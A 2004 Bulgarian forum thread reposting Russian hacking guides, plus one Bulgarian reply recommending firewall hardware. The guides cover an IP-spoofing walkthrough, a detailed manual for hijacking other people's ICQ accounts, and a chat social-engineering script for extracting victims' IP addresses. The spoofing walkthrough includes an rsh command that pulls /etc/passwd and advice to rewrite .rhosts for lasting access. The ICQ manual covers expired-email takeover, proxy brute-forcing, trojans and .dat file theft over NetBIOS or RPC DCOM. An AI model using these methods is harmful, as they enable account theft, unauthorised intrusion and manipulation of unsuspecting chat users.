Клубове Дир.бг
powered by diri.bg
търси в Клубове diri.bg Разширено търсене

Вход
Име
Парола

Клубове
Dir.bg
Взаимопомощ
Горещи теми
Компютри и Интернет
Контакти
Култура и изкуство
Мнения
Наука
Политика, Свят
Спорт
Техника
Градове
Религия и мистика
Фен клубове
Хоби, Развлечения
Общества
Я, архивите са живи
Клубове Дирене Регистрация Кой е тук Въпроси Списък Купувам / Продавам 07:11 26.06.24 
Политика, Свят
   >> Политика
*Кратък преглед

Страници по тази тема: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | (покажи всички)
Тема :: Что такое Спуффинг ?нови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано06.10.04 00:19



:: Что такое Спуффинг ?


Спуффинг – это ничто иное, как подделывание исходного IP адреса. Хотя мне очень понравилось толкование спуффинга в одном из толковых словарей Спуффинг заключается в использовании одной машины, чтобы исполнить роль другой. Чтобы понимать, как это происходит вы должны немного знать об установлении подлинности.

Каждый пользователь сталкивался с некоторой формой установления подлинности. Типичный пример этому соединение с сетью. Эта сеть может быть расположена в доме пользователя, его офисе, или как в данном случае Интернет. Большая часть распознавания известная обычному пользователю происходит на прикладном уровне. То есть установление подлинности полностью видны пользователю. Типичный пример этому то, когда пользователь сопоставлен с паролем на FTP или Telnet. Пользователь входит под своим логином и паролем; они заверены, и пользователь получает доступ к ресурсу.



В Интернет установление подлинности редко происходит на прикладном уровне. В Интернет каждую секунду происходит, какое либо распознавание, которое является невидимым для пользователя. Различие между этого рода распознавания и распознавания на прикладном уровне фундаментально. Установление подлинности на прикладном уровне происходит приблизительно так: Сервер бросает вызов пользователю и затем просит пользователя идентифицировать себя. Но чаще встречающееся распознавание выглядит чуть-чуть сложнее, здесь уже Сервер требует некоторую форму идентификации от пользователя и пока эта идентификация не проверена и не утверждена никакого обмена данными с Сервером не происходит. Такого рода диалоги «Клиент-сервер» всегда происходят автоматически (т.е. без человеческого вмешательства). При помощи спуффинга хакер пытается капитализировать автоматизацию диалога между машинами. Таким образом, Спуффинг атака - экстраординарный метод получения доступа, потому что при этом, хакер никогда не использует логин или пароль.

Кто поддается спуффингу.

Спуффинг нападение уникально в том, что может быть осуществлено против некоторого класса машин работающих с TCP/IP. К этим машинам я могу отнести некоторые версии UNIX (очень мало машин, которые легко поддаются спуффингу). Машины, работающие под DOS, Windows и Windows 95 не включены в эту группу. Спуффингу не поддаются Macintosh работающие на MacOS. Теоретически возможно, что Macs, работающий на A/UX, а также Linux могут быть подвержены такого рада атакам, но только при хорошем стечении обстоятельств. Думаю, что позже будут найдено большое количество сервисов подверженных Спуффинг атакам, но пока этот список не очень велик:



Любая конфигурация использующая Sun RPC запросы
Любая служба сети, использующая установление подлинности IP
R services


Sun RPC относится к стандарту Sun Microsystems standard of Remote Procedure Calls,

которые являются методами выходящих запросов системы, которые работают прозрачно по сетям (то есть выполнения команд по отдаленным машинам или сетям).

Уязвимость R services.

R services – rlogin и rsh, распространены в среде UNIX. Эти две программы предназначены для удаленного доступа на другие машины в Интернет. Они чем-то напоминают Telnet.

Эти программы посвойму уникальны:

Rlogin предназначена, чтобы удаленно логиниться на другую машину. Сегодня, rlogin в основном используется в локальных сетях, и только некоторые сервера поддерживают rlogin для удаленного администрирования т.к. rlogin посчитали проблемой безопасности.
Rsh позволяет Вам получить полный доступ к удаленной машине, и вы можете выполнять на ней любые команды. Например, вы можете получить файл пароля, используя команду: rsh our_target.com cat /etc/passwd >> our_target.com_passwd. rsh. поскольку эта функция является огромной дырой в системе безопасности, она обычно отключается. Но все же существуют сервера, на которых админы полные лохи и эта функция все же остается включенной J.
Из всего этого можно сделать вывод, что R services легко поддаются IP спуффингу.

Как работает спуффинг

Спуффинг отличается от обычного сканирования и использования системных дыр. Спуффинг используется уже тогда, когда определенная машина просканирована и уже точно известно, что она может быть подвержена спуффингу.

Трастовые отношения и Спуффинг вообще

Почти все формы спуффинга полагаются на трастовые отношения в пределах атакуемой сети. Под трастовыми отношениями я не подразумеваю человеческое доверие, к этому роду доверия я отношу доверие между компьютерами.

Существует такое понятие как спуффинг хардварного адреса (Hardware address spoofing). Такой тип спуффинга не относятся к сетевым картам, которые не используют софт для назначения адреса. Старые карты поддерживают изменение адреса через программное обеспечение, обычно с установкой джампера (jumper). Хороший пример этому старенькая карта Western Digital Ethernet. На более новых картах спуффинг адреса карты более чем вероятен, хотя стоит принимать во внимание, что IRQ может все еще устанавливаться при помощи джампера.

Этот тип спуффинга работает, потому что каждая машина на данном сегменте сети доверяет ее приятелям на этом же сегменте. Машины в пределах сегмента сети, которые знают адреса их приятелей, упомянуты как машины, которые доверяют друг другу. Когда такие трастовые отношения существуют, эти машины могут отдаленно выполнять команды друг для друга без большего количества установления подлинности, требуется только лишь идентифицировать исходный адрес.

Анатомия Спуффинга

Давайте начнем наш анализ после того, как хакер определил уровни доверия в пределах сети. Краткий обзор сегмента нашей ложной атакуемой сети, называемой Nexus.

Этот сегмент имеет два трастовых отношения:

Nexus 1 è Nexus 2, и Nexus 2 è Nexus 3.

Чтобы получить доступ Nexus у хакера есть два варианта:

Он может обмануть или Nexus 1 или Nexus 3, представив себя как Nexus 2

Он может обмануть Nexus 2, представив себя как Nexus 1 или Nexus 3

К примеру, хакер решает обмануть Nexus 2, представив себя как Nexus 3. Таким образом, его первая задача состоит в том, чтобы напасть на Nexus 3 и временно вывести ее из строя.

Шаг первый: Вывести из строя Nexus 3

Думаю здесь много писать не стоит ……. Можно использовать DoS

Шаг второй: Обнаружение Nexus 2

Этот шаг процесса довольно прост. Хакер посылает ряд запросов на Nexus 2, который отвечает рядом пакетов, указывающих получение запросов связи Хакера. Содержание этих пакетов ключ к spoofing технике.

Шаг третий: Управление

Получив образец, хакер делает другой запрос Nexus 2, требуя пустить его от Nexus 3. Nexus 2 отвечает Nexus 3. Однако, потому что Nexus 3 временно выведен из строя, он не отвечает. Вместо этого, идут ответы хакера.

Это наиболее трудная часть атаки. Здесь, хакер должен предположить (основанный на его наблюдениях схемы последовательности) какой номер последовательности Nexus 2 ожидает. Но в то время как идет обмен данными, он не может видеть номера последовательности, отправляемые Nexus 2. Поэтому, хакер должен послать его запросы в слепую.

Если хакер правильно предполагает номер последовательности, связь установлена между Nexus 2 и машиной хакера. Для всех целей, Nexus 2 теперь полагает, что хакер является Nexus 3.

Шаг четвертый: Открытый доступ хакера в эту сеть

Хакер должен создать более подходящую дыру, чтобы чтобы всегда проникать в сеть и не прибегать больше к спуффингу. Самый легкий способ заключается в том, чтобы переписать .rhosts файл так, чтобы Nexus 2 принял связи с любого IP и не требовал дополнительное установление подлинности.

Заключение

Спуффинг атаки случаются очень редко, но все же случаются. Все это из-за того что хакеру проводящему спуффинг атаку требуются специфические инструменты и навыки. Но будем надеяться что будет появляться все больше и больше людей разбирающихся в этой области.

Breaking the Waves




Тема Re: Гид на Новака в Клуб Политика ... Прочети първонови [re: Pимлянин]  
Автор Kpъr ()
Публикувано06.10.04 18:55



Това е малко offtopic, защото темата му е х-Американците!





Тема Re: Гид на Новака в Клуб Политика ... Прочети първонови [re: Pимлянин]  
Автор Kpъr ()
Публикувано06.10.04 18:59



Също off, защото се отнася по-скоро е антиеврейска тематиката, отколкото за гидовете... ;-)





Тема :: Все про ICQ- от пользования до угонанови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано08.10.04 12:35



:: Все про ICQ- от пользования до угона



1. Что такое ICQ, как этим "асику" пользоваться и зачем оно вообще нужно Не надо прикалываться над этим пунктом, я его писал не для всяких Senior Member'ов, а для людей, которые присылают на email вопросы типа "У меня вот многие спрашивают номер ICQ, а я не знаю, что это такое.

Сказали зайти на Asechka.Ru, но я так и не понял до конца, что же все таки это. Можете объяснить?". Это не прикол, а цитата из реального письма, пришедшего мне 5 дней назад. Было и еще 2 письма такого же смысла раньше. Вобщем, начнем-с...
1.1 Общие понятия. Бред невыспавшегося человека... Сейчас не иметь ICQ на компьютере, когда имеешь частый доступ в Интернет, равноценно тому, что не иметь дома телефона. Т.е. в принципе жить можно без этого, однако сложно и иногда не удобно. Переписываться по электронной почте не очень-то удобно, если нужно поговорить просто о чем либо, в большинстве чатов сидят одни дебилы и 11-и летние девочки, о такой штуке, как IRC знают не очень-то большое количество народа. Поэтому такая вещь, как ICQ в настоящее время просто не заменима. Для тех, кто не знает, ICQ (по-народному просто "аська") - это программа для того, чтобы перекидываться небольшими сообщениями друг с другом. Если хочется просто поговорить о жизни, обсудить дела или просто познакомиться с людьми со всего мира. При регистрации вам назначается определенный номер (uin), который позволяет другим найти вас среди миллионов других пользователей.

1.2 Выбор ICQ-клиента Самое простое, что можно сделать, это пойти на ICQ.com и скачать последнюю версию ICQ или ICQ Lite ("облегченная" версия программы). Это, конечно же, самая универсальная программа. Однако существует еще много программ, через которые также можно общаться через ICQ (ICQ-клиентов). Каждый клиент рассчитан на конкретного пользователя и имеет свои особенности, достоинства и недостатки. Для пользователей, которые любят простоту, но в то же время удобность, можно порекомендовать использовать &RQ или Miranda. Для тех, кто хочет, чтобы программа еще и радовала глаз и хорошо смотрелась на экране, я бы предложил использовать Trillian, тем более, что кроме приятного дизайна этот клиент тоже обладает большим количеством функций. Это наиболее популярные клиенты, однако существует и много других программ, которые тоже отличаются друг от друга, но я не буду особо вдаваться в описание клиентов, т.к. это займет очень много времени. Если вас заинтересовало это, то используйте поиск по Асечке или почитайте на форуме раздел "Альтернативные Мессенджеры". Ну а после того, как программа установлена, нужно зарегистрироваться. Жмем соответствующую кнопку при первом запуске программы (в некоторых клиентах регистрация только через web) и получаем свой уникальный номер.

2. Основные функции и особенности Не буду писать о всех функциях и настройках самих программ, т.к. в принципи не сложно разобраться самому, особенно если установить русификацию. Описания других ICQ-клиентов ищите на офф.сайтах. Тут конкретно об ICQ.

2.1 Контакт Лист Туда добавляются ваши друзья. Вы всегда будете видеть, когда они выходят в сеть, когда уходят и тд. Если пользователь в группе Offline, значит его нет в сети и поговорить с ним вы не сможете. Но все же можно отправить сообщение, оно будет получено в тот момент, когда человек войдет в сеть. Если пользователь в Online, значит он в сети и он сразу получит отправленное вами сообщение. Важной особенностью online-листа являются статусы. Думаю, что переводить их не надо. По ним можно определись, готов ли человек к общению с вами или он занят. Если вы ставите статус Invisible, значит, несмотря на то, что вы в сети, пользователи будут видеть вас в режиме Offline. Это обычно используют, когда хочется поговорить с кем-то конкретно, а для других оставаться незамеченным. Если пользователь находится в группе Awaiting Authorization (Ожидание авторизации), то вы не сможете видеть его статус, пока он не разрешит добавить себя в контакт лист. Попросите его разрешить это или скачайте патч, который позволяет добавлять без разрешения :)

2.2 Visible List, Inisible List и Ignore List Visible List - туда можно добавить пользователей, если вы не хотите, чтобы они смогли видеть вас всегда, даже когда вы в статусе Invisible. Inisible List - туда можно добавить пользователей, если вы не хотите, чтобы вы были для них видимы. Т.е. даже при нормальном статусе вы будете оставаться для них в оффлайне. Ignore List - туда можно добавить пользователей, если вы не хотите, чтобы их сообщения не доходили до вас. Внимание! Вы не будете получать уведомление о том, что вам были отправлены сообщения! Они будут просто игнорироваться.

2.3 Безопасность Самой важной особенностью безопасности является скрытие IP во время разговора по ICQ. Это делается при помощи настройки в Security & Privacy Permissions, далее в Peer To Peer Connection ставим Allow Peer To Peer Connection with any user upon your authorization (спрашивать разрешения). Теперь все будут видеть ваш IP, как 0.0.0.0. В большинстве ICQ-клиентов тоже есть такая функция. Нужно всего лишь поискать в настройках. Иногда она так и называется "Show IP address". Также можно установить возможность показа вашего статуса в сети: Security & Privacy Permissions -> General -> Allow others to view my Online / Offline status from the Web and from my ICQ Web Front Page. Следующая функция - это возможность требовать у вас разрешение на добавление в контакт лист. Т.е. вас смогут добавлять только после вашего согласия. Security & Privacy Permissions -> General -> Contact List Authorization Прикол в том, что любой более-менее знающий человек или пользователь другого клиента все равно сможет добавить вас без всякого разрешения. Поэтому этот запрет будет распространяться только на пользователей ICQ и ICQ Lite.

2.4 Alert/Accept Modes Можно добавить какое-либо действие для событий. Например выскакивающее окошко, если конкретный человек вошел в онлайн. Меню вызывается нажатием на контакте правой кнопкой мыши, и выбором Alert / Accept Modes. Также там можно добавить человека в Visible/Invisible листы. Все, что написано в следующих пунктах, нахрен не надо тем, кто узнал что-то новое в пункте 1 и 2 :) Поэтому не надо тратить свое время - идите лучше качайте аську, а потом когда разберетесь и немного осмыслите нужность этой программы, будете читать дальше :)

3. Угон и защита номера Если после прочтения данного пункта еще будут стучать в аську люди и говорить, что они давно хотят 6-знак, мучаются месецами в попытках угнать таковой, но у них не получилось угнать самый кривой, то могу сказать только, что либо этот человек просто лентяй, либо он даже не пытался что-либо сделать сам. Так как все, что написано далее просто подробнейший рассказ "что и как надо делать".

3.1 Что такое Primary Email Это пожалуй самое важное из всего, что касается угона. Primary Email - это, как бы, прямой путь к вашему паролю :) На самом деле под этим термином значится адрес электронной почты, который был введен при регистрации номера. Такой мэйл существует для любого 6-значного номера, т.к. в то время, когда они регистрировались введение мэйла было обязательным. Если же этого адреса нету в мэйл базах (подробнее в пункте 3.2), значит он просто был скрыт. Примари не существует у 5-значных номеров. Не спрашивайте почему :) Почему же этот мэйл так важен? Все потому, что пароль от номера будет высылаться на него всегда*, что поделать, но так вот устроена система высылки пароля. Даже если этот адрес удалить из информации о номере и прописать другой, то все равно на самый первый мэйл пароль будет* высылаться. Думаю стало понятно, почему этот мэйл должен всегда быть. На случай, если ваш номер будет угнан, на него всегда* можно будет выслать пароль. Как же узнать эот мэйл от номера, который вы хотите? Самый простой вариант - это посмотреть его через поиск в White Pages - чаще всего это и будет примари. Но иногда также стоит проверить его с помощью более ранних мэйл баз (подробнее в пункте 3.2). Если у вас есть мэйл, но на него не высылается пароль, значит этот адрес не является примари. Есть более старый. Проверить, настоящее ли у вас примари, можно на irc-канале #icqhackers. Многих интересует, возможно ли "отвязать" номер от примари? Т.е. сделать так, чтобы пароль на него не высылался. Это невозможно*. Только если вы нашли то, что значится в названии пункта 3.6 ;)) Самое главное, нужно понять, что имея примари от номера, вы всегда* сможете получить пароль от номера.

3.2 Базы мэйлов, логи ассаулта и т д Базы мэйлов - это такие листы, в которых находится информация о примари. Обычно они имеют вид "номер - примари мэйл" или логов программы Ассаулт в формате *.ini файлов, где кроме номера и мэйла есть имя и фамилия. Множество таких баз в текстовом формате можно найти в сети и скачать. Вариант такой базы с возможностью поиска можно посмотреть тут: asechka.ru/base.Также их можно сделать самому. Для этого существует специальный софт. Самая известная программа называется Assault, но на данный момент ее использование для сбора больших листов нереально, потому что такой способ сбора информации теперь блокируется сервером. Но есть несколько новых программ, которые работают через поиск в White Pages. Их можно найти в разделе Download. Но дело в том, что если будете собирать базы сами, то вы получите их такими, какие они есть на данный момент. Но вся фишка в том, что чем база старее, тем она полезнее, поэтому от новой можно не получить никакого толка. Ведь чем раньше была сделана база, тем более ранние мэйлы будут содержаться в ней. Вот почему так дорого стоят базы 99 и 2000 года. Там содержатся много реальных примари, а в новых многие из них уже изменены.

3.3 Регистрация несуществующих email'ов Если кто-то до сих пор не понял, зачем нам нужны эти списки с мэйлами, про которые рассказывалось в предыдущем пункте, объясняю. Все для того, чтобы проверять их на существование. Этот способ прост до невозможности. Надо всего лишь пытаться зарегистрировать мэйл, который прописан (или был прописан ;)) в информации о номере. Смотрим по базам мэйлы и пытаемся зарегистрировать. Если все удачно, то с помощью Password Retrive высылаем пароль от номера на этот адрес и забираем номер. Если пароль не высылается, значит этот адрес не примари - не повезло, ищите другой. Но проверять все вручную довольно-таки нудное и невыносимое занятие, поэтому все давно уже приспособили проги для спамеров, которые служат для проверки списка адресов на живучесть. Примерами таких программ служат Advanced Maillist Verify и Advanced Email Verifier. Их можно поискать на поисковиках или в новостях на Асеечке. Далее просто берем файлик с базой, делаем так, чтобы там остались только мэйлы - без номеров (это делается например в excel) и загоняем в программу, чтобы нам выдавалось, какие адреса существуют, а какие нет. Потом просто пробуем зарегистрировать мэйлы, которых нет - и все. Иногда это невозможно, т.к. сайт прекратил регистрацию и в нескольких других случаях. Но у этого способа есть один большой недостаток - эти программы ошибаются в большинстве случаев при проверке таких бесплатных сервисов, как Yahoo, Hotmail, MSN и др. Поэтому их придется проверять вручную. Также вам может пригодиться программа для сортировки мэйлов, например, "только hotmail.com" или "только mail.ru и mail.com". Тогда нужна программа E-Sort или V-Sorter, которые были написаны людьми с этого форума. Программы можно найти тут на сайте. Этот способ самый надежный, т.к. мы получаем номер вместе с примари, да еще и в большинстве случаев номер не используется, т.к. владелец забыл даже о своем мэйле и тот анрегнулся.

3.4 Брутфорс Следующий способ основан на простом переборе паролей. Как это ни странно, но иногда это самый эффективный способ получить конкретный номер. Нужно всего лишь иметь программу, с помощью которой будем перебирать, и файл-словарик, в котором будут содержаться слова для перебора. Самая лучшая программа - это IPDbrute. Ее последнюю версию можно скачать с сайта iFud. Там же на форуме можно почитать о советах и инструкциях по ее использованию. Словарики берем с Passwords.Ru. Также перебирать обязательно нужно с помощью прокси, которые можно ежедневно бесплатно набирать на ProxyChecker.Ru, только там нужно зарегистрироваться. Все, теперь все готово для начала перебора. Но иногда еще может пригодиться программа V-Listmaker (если ссылка не работает, поищите по форуму). Она нужна для склеивания файлов типа "номер;пароль" или просто для работы со словарями. Но сразу хочу заметить, что иногда лучше перебирать много номеров на один или два пароля, чем один номер на миллион паролей. Но если надо конкретный номер, тогда совсем другое дело ;) Еще можно добавить, что этот способ будет самым эффективных для людей, у которых коннект ISDN или ADSL (хотя на модеме тоже все отлично перебирается). Минус в том, что здесь мы получаем уин без примари :(

3.5 Трояны, локальный или удаленный доступ к компьютеру и другое Еще один способ добычи уина - это трояны. Надеюсь не надо объяснять, что это такое. Если не знаете - то бегом на Яндекс вбивать "что такое трояны" :) Большинство новых коней умеют тырить пароли от ICQ. Наиболее продвинутые также забирают еще и пароли из &RQ, Trillian'а и Mirand'ы. Этот способ тоже не особо сложен - нужно только убедить пользователя открыть *.exe файл. Минус в том, что про это все нормальные люди знают и файлы типа superfotka.jpg__________________.exe не откроют. А ламеров на красивых номерах не очень-то много :) Также угнать номер можно имея локальный доступ к компьютеру, проще говоря, если вы можете понажимать клавиши на компьютере, с которого хотите увести уин :) Для этого нужна программа Advanced Instant Messenger Password Recovery от ElcomSoft. Если поискать, ее несложно найти с кряком. Минус способа в том, что при этом вы крадете номер у своего соседа/коллеги по работе/друга/девушки/бабушки :) и тд. Это не есть гуд :( Следующий момент - это удаленный доступ к компьютеру. В принципи сюда можно было приписать троян, однако я это вынес отдельным подпунктом. К удаленному доступу можно отнести воровство *.dat файла с помощью открытых портов, типа 139, чужих троянов, которые открывают эти порты или, что сейчас самое реальное, багов в Windows XP/2000/2003. О воровстве через NetBIOS почитайте на хакерских сайтах (ключевое слово "NetBIOS" или "139+порт"), а о использовании бага в виндах отлично рассказал ven000m в статье RPC Dcom - How To. Нужно найти папку с ICQ, в ней есть папка, которая равна версии аськи, например для ICQ2002a она будет 2002a, идем туда и берем оттуда файлы формата НОМЕР.dat, типа 666666.dat. Перекачиваем этот файл себе на компьютер и дальше забираем оттуда пароль с помощью PassFinder by Feathery (от какой-то Физеры (с) не знаю кто :)))). Прогу эту можно найти как всегда в Download. Также есть и другие программы для вскрытия *.dat файлов. Также если хочется, можно еще почитать хистори с помощью ICQ History Reader. Берем там же.

3.6 Баги в ICQ Бывало и такое. Вперед искать ;))) 3.7 ** 3.8 Пароли и все о них Если бы эта статья писалась месяца два назад, то этот пункт получился бы, наверное, самым большим. Теперь же все пароли со спецсимволами и многострочные пароли легко можно сбросить на обычный, поэтому напишу только общие данные. На данный момент достаточно иметь пароль, типа fGrj6D4q (быстро все добавили этот пароль в словари для брутфорсов - завтра такие будут стоять на каждом третьем номере ;)) и уже при этом можно быть практически спокойным. Перебором такой пароль подобрать будет сложно (если тот, кто будет перебирать, не читает то, что я пишу в скобках :)), если у угонщика будет примари от вашего номера, то вас не спасет никакой пароль, тоже самое, если вы любите открывать трояны или 139-й порт :) Вобщем нет смысла много писать на эту тему, нужно всего лишь придумать какой-нибудь сложный пароль и жить спокойно :) При угоне номера если вы получаете на email пароль, который не подходит, когда вы пытаетесь законнектиться с ним на сервер, то тут может быть несколько вариантов: а) Пароль зашифрован - воспользуйтесь ссылкой, которая находится в середине письма, чтобы сбросить пароль на обычный б) У вас слишком кривые руки, чтобы правильно скопировать и вставить пароль из письма в) Номер "заморожен", т.е. вам очень не повезло и его нельзя больше использовать г) ** Не знаю, но лично мне больше всего хотелось бы, чтобы всегда проблемой был пункт "а". Иногда попадаются номера, проблему с которыми можно отнести к пункту "в". Но больше всего я буду беспокоиться, если виной неправильности моего пароля будет пункт "б" :)) Иногда бывает такое, что на email приходит пустая строка, т.е. как бы пароль отсутствует вообще. Если в письме с таким паролем присутствует ссылка на сброс пароля (пункт "а"), то просто сбросьте пароль на простой. Если же ссылки нет, то значит этот уин из серии zombie (привет Элиту ;)) и его можно вернуть к жизни, только написав в службу поддержки ICQ. Это делается с помощью страницы на сайте, ссылка на которую дается после высылки (или попытки высылки) пароля на примари. Но в общении со службой поддержки тоже есть свои тонкости - надо произвести впечатление полного идиота, который много лет не пользовался аськой, забыл пароль, а тут ему пришел пустой, а он не понимает в чем дело и просит помощи ;))

4. Самый необходимый софт для ICQ Существует множество программ для аськи. Большинство из них можно найти в разделе Download на Асечке или на форуме. Выделю лишь основные программы, которые следует иметь всем, кто хочет этим заниматься: ~ Программа для смены паролей. Менять каждый пароль, добавляя уин на компьютер реально, но жутко неудобно, тем более, если существует множество специальных программ. Примером является C4PassChanger. ~ Программа для составления баз "uin - email". Подробности и примеры в пункте 3.2! ~ Программа для проверки мэйлов на существование. Все равно рано или поздно чекать вручную надоедает. Подробности и примеры в пункте 3.2! ~ Программа или патч, с помощью которого можно смотреть IP адрес собеседника. Пример программы - uin2ip. ~ Программа для просмотра реального статуса уина. Для определения тех, кто скрывается в инвизе. Конечно же, DFM :) ~ Программа для вскрытия паролей на локальном компе. На случай, если вы забыли свой или чужой пароль. Лучшая - Advanced Instant Messengers Password Recovery. ~ Брутфорс. Все равно когда-нибудь он понадобится ;) Конечно же IPDbrute! Весь другой нужный софт можно найти в теме Софт и кряки к нему Если вы хотите написать свою программу для ICQ, то лучше всего для этого будет использовать TICQClient для Delphi.

5. Ссылки. Те, что я смог вспомнить в 5 утра :) Сайты и форумы на тему ICQ. Первые 2 должны быть в Избранном у каждого! http://wwp.icq.com/scripts/search.dll?to=199111 https://web.icq.com/secure/password http://www.asechka.ru http://www.icqinfo.ru http://www.8th-wonder.net http://www.allicq.com http://nipy.wormhole.ru 6. Комментарии * Бывали случаи отвязывания номеров от примари, но таких немного. Пользуясь случаем, хочу...передать привет Хинту и тем, кто нашел такой баг в прошлом году ;) ** Те места текста, в которых я не очень уверен. В смысле, если я тут что-нибудь забыл, то простите и не судите строго :) *** Все это писалось ночью, поэтому скорее всего будет куча грамматических и стилистических ошибок - не надо придираться ;) Всем спасибо за прочтение. Удачи...

Breaking the Waves




Тема Вчера писах на един приятелнови [re: Pимлянин]  
Автор Pимл@нин (ProconsulBG)
Публикувано08.10.04 19:57



Постинга е за Венко

Вчера писах на един приятел и го помолих за техническо мнение. Ей ми тук отговора:


... Нали ти бях Казал да четеш постингите ми.Сега по въпроса:
1. Никой няма да се занимава да конфигурира спуффинг машина за хакване на Фаиауола.
Ако е станало така имало е вече готова спуффинг станция и са я използвали.Не са хаквали руския форум
а само са използвали IP функцията.
2. Какъв е проблема някой от абонатите на Сепктърнет да е писал във форума и да се представи за Фаиауола?
По-лесно от спуффинга.
3. Руския форум е избран по критерии на лесно намиране с Google. Не е хакерски и никой не е искал да го хаква.
Много тъпо са го направили.
Това с форматирането на диска ме весели.firewall е пълна лимонада.
За теб ето идеалната хардуер конфигурация:
Бегаш до най-близкия шоп и купуваш:
1. ADSL Modem Router Eicon DIVA 2440 ( много КууЛ канадска играчка ), слагаш му firmware за DIVA 2440DI бридж
( за да се забоде дитектно в мрежата без NAT таблици ) ;конфигурираш му хардуерния firewall на максимално трето
ниво и резачката на пакетите заспива. Ако искаш да конфигурираш сам филтрите пиши ми иначе ще улееш работата.
2. D-Link DI-624 WiFiLAN Router ( да не вземеш 624+ , различно е ) бодваш в него Дивата и конфигурираш
D/Link хардуерния firewall на най-високо ниво , после кеф ти ВиФи кеф ти кабел.
3. Другите неща ги знаеш - никакъв шеринг, никакво ИЦК, никакви бележки и писма, стена на компа,
връзка през фирмените гетуей или прокси.

После ги покани да ти "форматират диска".Може и да се намери някой майстор да пробие анонимно прокси, две хардуерни
и една софтуерна стени, гаранция няма.

Иначе хакерите са симпатяги ... ако кликнеш да видиш профила ми на Римлянин ( тоя дето е на темата за Гида на новобранеца )
на прозорчето дето се отваря долу на Toolbar пише " Профил за chichkoparichko " :-))). кадърни момчета и с чувство за хумор
8-)))

Може на някой да послужи. Ще го пусна и в Гида.



Тема :: Тырим IP из чатанови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано09.10.04 23:43



:: Тырим IP из чата

Хотелось бы поговорить о том, что так волнует большинство начинающих хакеров, а именно о том, как определить IP в www-чате. Практически в любом форуме можно найти вопрос на эту тему, но ответы на него, мягко говоря, непрофессиональны - в одном из форумов (каком не скажу, смотрите сами;-) я даже видел ответ вроде "А ты, придурок, жми пару раз Ctrl+Alt+Del два раза"... Ну зачем же так!!!

Я конечно не суперхакер, и сегодня расскажу только о самых простых способах, продолжение с более-менее трудными методами определения IP в чатах я напишу только если эта статья найдет свой отклик в сердцах и душах посетителей этого сайта, выраженный в более-менее благожелательной форме=). Итак, приступим.

Для начала хотелось бы объяснить то, почему определить этот самый IP в WWW-чате так трудно. Для этого нужно понять принцип работы обычного чата, который прост как все гениальное8). Обычно чат состоит из нескольких фреймов - "общего поля" и всего остального. Иногда фреймов больше - банер какой-нибудь прилепят или навороты какие... Но это так, к слову. Вот подключились вы значит к серваку и видите как минимум приглашение о входе и "средоточие мысли" участников чата - "общий эфир", если позволите так выразиться ;-). Общий принцип работы таков - фрейм общего окошка постоянно перезагружается, а его содержание меняется. То есть печатаете вы пару слов, щелкаете "Enter" и ждете. Ваш комп отправляет эту фразу серваку, сервак оформляет ее в соответствии с вашими требованиями (ну цвет там, размер шрифта и т.д.) и добавляет в HTML в этот самый фрейм - ваш комп выкачивает обновленную версию фрейма, меняет его содержание и через несколько секунд вы видите свое сообщение (да и все остальные его видят =). То есть НЕПОСРЕДСТВЕННОГО контакта не происходит даже в привате - ваш любимый IP знает только сервак, а уж он-то его добровольно вряд ли отдаст;) То ли дело Ирка... Но я опять отвлекся. Конечно большинство чатов поддерживают отправку непосредственно тегов (тэгов, тагов - как больше нравится=) HTML, и в принципе, написав простенький java-апплет можно чего-то добиться, но вот незадача: в абсолютном большинстве чатов теги фильтруются - эта дырка стара как сами чаты и практически везде уже заделана...=(

Но не все потеряно - хакинг пока оставим в покое (до следующей статьи на эту тему=) и возьмемся за социальную инженерию!!! Объясняю: узнать IP хорошо к вам расположенного человека не составляет никакого труда, а расположить человека к себе так просто, если хотя бы немного разбираешься в психологии, конфликтологии и умеешь думать головой - в общем даешь социальную инженерию в массы!!! Итак, идем на любой чатовый сервак, регистрируем новое мыло (обычно все чатовые серваки являются мыльными и наоборот) если не хотим светить любое из уже имеющихся, если вам по боку - не регистрируйте, но это, IMHO, плохой стиль. Затем заходим в этот самый чат под любым ником, присматриваемся, выбираем жертву, пообщавшись со всеми помаленьку, если чел зарегистрирован то можно узнать кое-что о нем из анкеты (они почти везде есть и доступны для общего просмотра - хобби там, город и еще всякая ерунда, но нам пригодится=) и... УХОДИМ!!! Входим через пару минут под другим ником и приступаем к "клейке". Да, чуть не забыл - всегда представляйтесь так, чтоб по нику был понятен ваш пол, при этом желательно чтоб он был противоположен полу "жертвы" (не поймите меня неправильно - нужно ВЫБИРАТЬ пол - пацаны, побудьте девчонками и наоборот) - так обрабатывать легче, только сыпь комплименты и слушай - и IP в кармане. Итак, чтоб не проколоться, если вы "временно сменили ориентацию"=), избегайте фраз вроде "я говорила", "я пошел", лучше сказать "я говорю", "я ухожу" Далее, в разговоре, надо попытаться заманить жертву в ИРК - там-то IP узнать без проблем;) Расхваливаем достоинства ИРКи, умалчиваем о недостатках, даем канал - и - вуаля - IP в кармане!!! Но здесь может быть и так - ИРКи у жертвы нет (просим скачать с www.mirc.com, мотивируя тем что, мол, всего метр, а я еще ща объясню как юзать - будет просто супер, про все чаты забудешь:) или она (жертва) просто не хочет никуда уходить - мне, мол, и здесь хорошо;)... Не надо психовать и орать "Дура(к)!!!"... Будем действовать потоньше=). Просим прислать фотку - у любого заядлого чатщика какая-нибудь (нам не важно, пусть хоть Клаву Шифер или Жан Клода как Дамма шлют) есть для этих целей - на то самое мыло, которое перед этим зарегистрировали. Если жертва отказывается или фотки нет, опять не психуйте! В привате задавайте такой вопрос, который потребует ответа на пол экрана или разглашения чего-то интимного (в смысле личного;-), что жертва уже не прочь рассказать вам, но не готова представить на всеобщее обозрение, дожидайтесь положительного ответа, закрывайте его (приват) к чертям (ни один нормальный чатщик не будет сидеть только в привате, обязательно будет участвовать и в общем базаре, так что не волнуйтесь, не потеряетесь=) и пишите в общем поле фразу вроде "Ой, приват завис... Может на мыло пришлешь, а то неудобно как-то так много (такие серьезные вещи) в "общем эфире" писать". Главное - не давить излишне сильно и не давать свое мыло до получения согласия жертвы на ваше предложение "прислать хоть что-нибудь"=) В общем выбиваете изо всех сил "е-мое" письмо, да еще так, чтоб его сразу отправили... Ну а дальше детали: смотрите IP в заголовке - и все дела (если кто-то не знает как это сделать - пишите в откликах, напишу и на эту тему, разберу для вас пару заголовков поподробнее).

